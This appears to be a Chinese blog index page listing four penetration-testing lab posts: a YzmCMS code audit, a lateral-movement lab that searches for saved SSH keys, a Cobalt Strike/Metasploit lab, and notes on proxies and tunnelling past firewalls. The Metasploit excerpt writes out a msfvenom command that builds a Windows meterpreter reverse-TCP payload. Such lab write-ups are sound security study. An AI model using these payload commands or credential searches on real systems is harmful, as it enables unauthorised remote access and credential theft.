摘要: YzmCMS代码审计 YzmCMS代码审计 代码审计 #CMS 0x01 通读 index.php 里面有很多的define,用这个代码运行下 foreach(get_defined_constants(true)['user'] as $k=>$v){ echo $k.' '.$v."\r\n"; } APP_DEBU 阅读全文
posted @ 2023-11-01 10:54 4eg1s 阅读(51) 评论(0) 推荐(0) 编辑
摘要: 靶场环境介绍 172.16.250.10 Web服务对外开放 172.16.250.30 Web应用只允许当前内网环境的主机访问 172.16.250.50 数据库服务器,不出网。实现站库分离 知识点 一般默认情况下SSH密钥都存放在~/.ssh/目录下,可以使用文件中搜索已保存的ssh凭证: gr 阅读全文
posted @ 2023-11-01 10:52 4eg1s 阅读(201) 评论(0) 推荐(0) 编辑
摘要: 路由不出网-CS-MSF控制上线 靶场搭建 MSF上线 先上线有外网的: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.47.129 LPORT=7777 -f exe > msf001.exe 然后: msfconsole use exploit/multi/h 阅读全文
posted @ 2023-11-01 10:51 4eg1s 阅读(15) 评论(0) 推荐(0) 编辑
摘要: 域防火墙-不出网隧道上线 知识点 代理: 当网络不通的时候使用代理,比如处在两个网络环境中,代理可以是服务器、被控主机等,当成节点确保通讯正常。 隧道: 也是解决网络不通,但是是因为防火墙或者其他防护策略,导致TCP或者其他某些协议过滤掉了,这时候需要用隧道技术解决出网问题,例如TCP被限制可以使用UDP协议封装出网。 正向 阅读全文
posted @ 2023-11-01 10:51 4eg1s 阅读(32) 评论(0) 推荐(0) 编辑